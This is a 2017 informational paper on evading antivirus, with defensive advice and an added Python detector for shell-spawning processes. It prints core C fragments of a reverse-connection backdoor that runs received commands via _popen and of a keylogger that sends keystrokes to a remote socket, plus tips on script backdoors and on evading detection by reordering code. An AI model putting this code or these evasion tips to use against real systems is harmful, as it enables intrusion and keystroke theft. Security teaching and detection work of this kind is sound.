Bypass an antivirus: too simple
Trivial Techniques for Evading and Solutions to Defend
Author: Stefano Gorresio
Date: 04 May 2017
Index
1) Premise (p. 3)
2) Testing Environment (p. 4)
3) Introduction (p. 5)
4) There are more ways to solve the same problem (p. 5)
5) Examples (p. 8)
   a) Executable Backdoor (p. 8)
   b) Remote Keylogger (p. 11)
   c) Script Malware (p. 13)
6) Conclusion (p. 15)
   a) Techniques for evading AV (p. 15)
   b) Techniques for defense (p. 15)
7) Note (p. 17)
1) Premise
This document is not exhaustive; it is intended only to show how an antivirus can be ineffective in many situations.
This topic is described in a very superficial way.
This is not a complete guide illustrating AV evasion techniques, but only an informative document.
This document is a report of many tests I made over the years.
Everything written in this document has been tested several times.
Every test done will be illustrated so that it can be reproduced by anyone.
This simple analysis does not claim that an antivirus should not be used... in fact, an antivirus must be used, but it should not be considered a complete and exhaustive defense system.
The content exposed in this paper is nothing new, but given the analysis made and the "strange ideas" that people and companies have about computer security, it seemed right to publish some considerations.
These malware are also simple and obvious, but as tested, they proved fully functional in some penetration tests.
The full source code of these malware is not public for now.
This document was written for informative and didactic reasons.
I apologize if my English is bad. XD
2) Testing Environment
All targets are computers with Microsoft Windows (Windows 10 and Windows Server 2016) and all attackers are computers with GNU/Linux (Arch Linux and Kali Linux).
The malware were tested on the VirusTotal service and directly on Windows Defender, Avira and McAfee (trial version). Other tests were done occasionally on Sophos.
The malware are programmed for Windows in C (compiled with gcc) and in Assembly x86 and x86_64 (compiled with FASM); the C&C server/client is programmed in Python 2.7 (working also on Windows).
These analyses were performed in a distributed and non-continuous way from 2012 (the year when I became interested in malware) to date.
Below is the list of malware programmed (or downloaded) and used for testing:
• BackDoor17: Reverse connection backdoor programmed in C for Microsoft Windows. Executes the cmd and powershell commands received from the remote host.
• RemoteKeylogger: Bind connection keylogger programmed in Assembly x86 (32 bit exe) for Microsoft Windows. Sends the keys pressed to the remote host.
• RemoteKeylogger17: Reverse connection keylogger programmed in C for Microsoft Windows. Sends the keys pressed to the remote server. Porting of a keylogger programmed in 2014 (RemoteKeylogger).
• Metasploit Payloads: Payloads (e.g. reverse shell) included in the Metasploit Framework.
Some of these programs were written for tests and are not fully adequate for a penetration test (although they can be used without problems).
3) Introduction
Many people and companies are convinced that IT security can be managed only with the use of a good antivirus.
Furthermore, there is a common belief that a malware able to evade AV must be complex, advanced software: polymorphic, smart, etc.
Wrong…
The best way to bypass an antivirus is simplicity and banality in programming.
Usually, malware are stupid programs that do simple things like running commands, connecting remotely, replicating, and so on.
If a malware acts like a regular program, the AV does not deem it malicious.
4) There are more ways to solve the same problem
Let's make an example...
Most of the reverse shells that can be found on the internet are easily detected by AV.
But if we want to use a reverse shell on a Windows Server (unfortunately the most used operating system for servers in Italy) with an antivirus that does its job well against backdoors, what can we do?
The first question to ask is: what do I want exactly?
A reverse shell (in any form) is usually used to execute shell commands remotely and see the output of the commands sent.
The problem may thus change from "how do I run a reverse shell?" to "how do I execute commands remotely and see the output?".
The problem is the same, but honestly I find it more convenient to ask the question in another way.
Instead of using an already-programmed reverse shell, we try to program it in C.
Many reverse shells for Microsoft Windows work like this:
1. Initialize and create a socket
2. Connect to the C&C server (attacker host or a specifically dedicated server)
3. Call the CreateProcess function with cmd.exe, with stdin, stdout and stderr redirected to the socket
The third point is the one that can cause serious problems.
Creating a connection to a host is not malicious, but running cmd.exe with "the flow" redirected to the socket just created is quite suspect.
Note: antivirus do not tend to analyze only a single part of the code; they tend to analyze everything.
An antivirus can consider a call to an API suspect or harmless also on the basis, for example, of the calls or operations carried out previously.
To achieve our goal, is it mandatory to use CreateProcess, launch cmd.exe and attach the socket?
Thankfully (or unfortunately) no.
We can trivially try the following reasoning:
What should our program do?
It must connect to a remote host, receive commands (receive data), execute shell commands locally and send the output (send data).
What can we already do without any problems?
We can connect to a remote host and send and receive data.
What are we missing?
Running shell commands locally.
The problem then becomes "how do I execute shell commands locally and save the output in a buffer (for subsequent transfer)?".
The answer is found in the _popen function.[1]
    FILE *pipe = _popen(char *command, "rt");
pipe = output (data that will be sent)
command = input (received data)
Now we just have to connect everything.
    uint8_t esegui(FILE *pipe, char *data, SOCKET s){
        char *data_pt = data;
        // Execute Command
        if((pipe=_popen(data, "rt")) == NULL)
            return 1;
        // Send Output (one line at a time)
        while(fgets(data_pt, MAX_SIZE, pipe))
            if(send(s, data, strlen(data), 0) < 0)
                return 1;
        _pclose(pipe);
        return 0;
    }
For each command received, multiple outputs are sent (one line at a time).
This code works, but it is not optimized.[2]
But for us this is enough.
… Our backdoor programmed in C works and the antivirus is not a problem.
The reasoning and the work done are stupid, but very effective.
It's true! We have built a simple backdoor… but the procedure for programming a complex persistent backdoor, with encrypted connection, able to handle all exceptions and be "robust at all", does not change.
I confirm what many people say... the best solution is the simplest and most banal.
5) Examples
a) Executable Backdoor
A backdoor is a program that allows access to a system bypassing any authentication, etc.
They are usually programs that allow the execution of shell commands remotely, often managing the remote connection themselves (a webshell does not handle the connection).
A good backdoor must be undetectable (by AV and humans), should be able to handle all exceptions (especially on sockets), its communication between the target and the attacker must be cryptographically secure (carrying confidential data across the Internet in clear during a penetration test is not very nice) and it must be persistent (for long-term access).
I personally prefer "reverse" connections (from target to attacker) simply because they are the least annoying to manage, and I noticed that they tend to be less detectable.
BackDoor17 is a reverse connection backdoor programmed in C that allows the execution of arbitrary commands on Microsoft Windows.
The program netcat is sufficient and great for controlling the backdoor.
The connection is not encrypted.
This backdoor is not designed for long-term access.
When this backdoor is executed, it tries to connect to a TCP socket specified at programming time.
At each connection closing (or any connection problem), the program waits for a number of seconds (I have set 30 seconds) before trying to reconnect.
The following are the commands that you can perform:
    <command>              Windows cmd.exe commands
    powershell <command>   Powershell commands
    exit                   Close connection (retry after 30 seconds)
    kill                   Kill backdoor (terminate process)
The Winsock2 API is used to handle the connection.
The _popen function is used to execute shell commands.
Creating a connection to a host is not a malevolent action.
Calling the _popen function is not a malevolent action.
The whole is not detected as malicious.
This backdoor is very useful as a "first access backdoor".
By running this backdoor on Windows Server with sufficient permissions you can easily disable the local security systems (antivirus, agent, etc.) and then load a more powerful and more detectable backdoor (e.g. Meterpreter).
Note: The > character is optional and only indicates where the command is typed.
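A defender-side counterpart to the reasoning above, added here as an example and not part of the original paper: since _popen on Windows runs each command through the command processor, a process that holds an outbound connection and then repeatedly spawns cmd.exe is a pattern that process and network telemetry can correlate, even when each call looks harmless on its own (the same "previous calls" logic the paper attributes to the AV). The event shape (ids 1 and 3, as in Sysmon) and the sample events are constructed assumptions.

```python
"""Correlate outbound connections with later shell spawns by the same process.

Added example, not code from the paper. Event records are constructed in a
simplified Sysmon-like shape (assumption): id 3 = network connection,
id 1 = process creation. Events are assumed to be in time order."""
from collections import defaultdict

# Constructed sample telemetry (not from the paper): pid 4321 is the suspect.
EVENTS = [
    {"id": 3, "pid": 4321, "image": r"C:\Users\u\svc.exe", "dst": "203.0.113.5:4444"},
    {"id": 1, "pid": 5001, "ppid": 4321, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"id": 1, "pid": 5002, "ppid": 4321, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"id": 1, "pid": 5003, "ppid": 4321, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell Get-Process"},
    # Benign: explorer spawns a single cmd.exe with no prior outbound connection.
    {"id": 1, "pid": 6001, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    # Benign: a browser has connections but never spawns a shell.
    {"id": 3, "pid": 777, "image": r"C:\Program Files\browser.exe", "dst": "198.51.100.9:443"},
]

SHELLS = ("cmd.exe", "powershell.exe")

def find_shell_spawners(events, threshold=2):
    """Return {pid: finding} for every process that opened an outbound
    connection and afterwards spawned at least `threshold` shell children."""
    connected = {}              # pid -> (image, dst) of its first outbound connection
    spawns = defaultdict(list)  # parent pid -> command lines of shell children
    for ev in events:
        if ev["id"] == 3:
            connected.setdefault(ev["pid"], (ev["image"], ev["dst"]))
        elif ev["id"] == 1 and ev["ppid"] in connected:
            if ev["image"].lower().endswith(SHELLS):
                spawns[ev["ppid"]].append(ev["cmdline"])
    return {pid: {"image": connected[pid][0], "dst": connected[pid][1], "commands": cmds}
            for pid, cmds in spawns.items() if len(cmds) >= threshold}

if __name__ == "__main__":
    for pid, f in find_shell_spawners(EVENTS).items():
        print(f"pid {pid} ({f['image']}) -> {f['dst']}: {len(f['commands'])} shell spawns")
```

The threshold is deliberately low because the paper's backdoor spawns one command processor per received command; tune it against your own baseline of legitimate network-connected processes that use shells.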
b) Remote Keylogger
A keylogger is a program that intercepts keystrokes and stores them in a file or sends them to a remote server.
In my research, I programmed and analyzed two keyloggers with the same "capture" operation, but programmed differently and with different connection management.
RemoteKeylogger is a bind connection keylogger and it has been programmed in Assembly x86 (32 bit). On VirusTotal, it was detected by 6/59 AV.
I programmed it in 2014.
RemoteKeylogger17 is a reverse connection keylogger and it has been programmed in C (64 bit). On VirusTotal, it was detected by 1/61 AV.
In both keyloggers, the "capture keys" algorithm is the same, but the machine instructions, the architecture and the type of connection change.
The API call is the same in both.
netcat is a great client/server.
The socket management code is identical for RemoteKeylogger17 and BackDoor17.
Once a data transmission fault happens, RemoteKeylogger17 waits a defined time (30 seconds) before trying again to connect to the server.
To capture keystrokes, the GetAsyncKeyState function has been used to check whether a specific key is pressed at that instant.
Every 80 milliseconds a scan is performed on some keys of interest (letters, numbers, shift, space, enter, etc.) and if at that time a key is pressed, the key is sent to the remote server encoded in ASCII.
This is the classic behavior of many keyloggers on Windows.[3]
Below is a part of the RemoteKeylogger17 code that checks the keys with virtual-key codes from 48 (0x30) to 90 (0x5A).
    for(i=0x30; i<0x5B; i++)
        if(GetAsyncKeyState(i)){   // Check if the button is pressed
            str_pt[0] = i;
            if(send(s, str_pt, 1, 0) < 0)
                return;
        }
The entire code must obviously be improved.
i is a uint8_t
str_pt is a char *
s is a SOCKET
Note: As can be seen in the figure above, the timeout after the detection of a pressed key (a single sleep of 80 ms) should be properly adjusted. The ^ character indicates that Shift was pressed.
c) Script Malware
Many malware are simple scripts (e.g. webshell, VBS, bash, etc.).
Malware scripts are usually less detectable than the others.
Let's take an example.
For the same payload (e.g. windows/x64/meterpreter/reverse_https of the Metasploit Framework), a VBS is less detectable than an executable exe.
Webshells are less detectable.
Note: It's true, aspx code is not really a script (it is compiled), but from a "malware" point of view it looks more like a script than an executable (which it actually is): from an attacker's point of view it is treated as a script (source code is loaded, not executable code) and antivirus seem to see it as a script (the detection probabilities are almost identical to those of a script).
6) Conclusion
a) Techniques for evading AV
In a penetration test, personally, I always prefer to use script backdoors.
On Windows, as the first access backdoor, I recommend using a powershell script (less detectable than a VBS script).
On UNIX-like systems, as the first access backdoor, I recommend the use of an sh script (I do not recommend the immediate use of bash and python, as they are not always present).
As webshell, I recommend the use of scripts controllable directly from the browser (I do not recommend the use of reverse shells: more detectable and more problems with any firewall).
If a code is detected by an antivirus, the simplest technique to evade the AV is trying to change the instructions, their order, or the parameters passed to the API.
The antivirus analyzes the instructions and the API calls, not the algorithm.
b) Techniques for defense
To defend against malware, the use of an antivirus is not enough.
In computer security, one thing is important that many people and many companies do not have: good sense.
It is useless to have antivirus, IDS and "enterprise support" at exaggerated cost when you leave credentials (e.g. pfSense, server admin, etc.) at the default values or easily guessable (the most stupid and widespread security hole).
Common replicating malware do not replicate through buffer overflows, 0-days, or complicated methods; they simply replicate through shared media, specific mechanisms using default credentials or other simple mechanisms left open (almost always out of laziness and not by necessity).
I am convinced that a network must be minimal: it must be modular, with the bare minimum.
It is useless to have a heavy operating system with thousands of processes for a variety of things when in the end you use it only as a file server or web server.
The most common result is unstable, underperforming servers that require monstrous hardware to do things that a Raspberry Pi could also do (I exaggerate, but the reality is not much different).
These problems, of course, increase information security risks: too many minimally monitored unnecessary services and, especially, too much freedom of movement increase the probability that malware can operate without problems (as well as making cyber attacks easier).
… All that I have written is obvious, but for many companies and people it does not seem to be obvious at all.
In conclusion... the antivirus is important (sometimes it plays an important role in computer security), but if you want to use IT infrastructure also for critical activities, make sure you know well all that you do (for example how the software you are using works), and above all take great care of computer security (cyber security also deals with the robustness of information, not only with its confidentiality).
7) Note
This paper should be used only for educational purposes, analysis and any purpose that does not violate any applicable law.
Some screenshots were taken on systems set to the Italian language and some images will have text in Italian.
[1] On the internet there are many backdoor codes with this functioning.
[2] This code was taken from BackDoor17.
[3] On the internet, you can find many similar codes.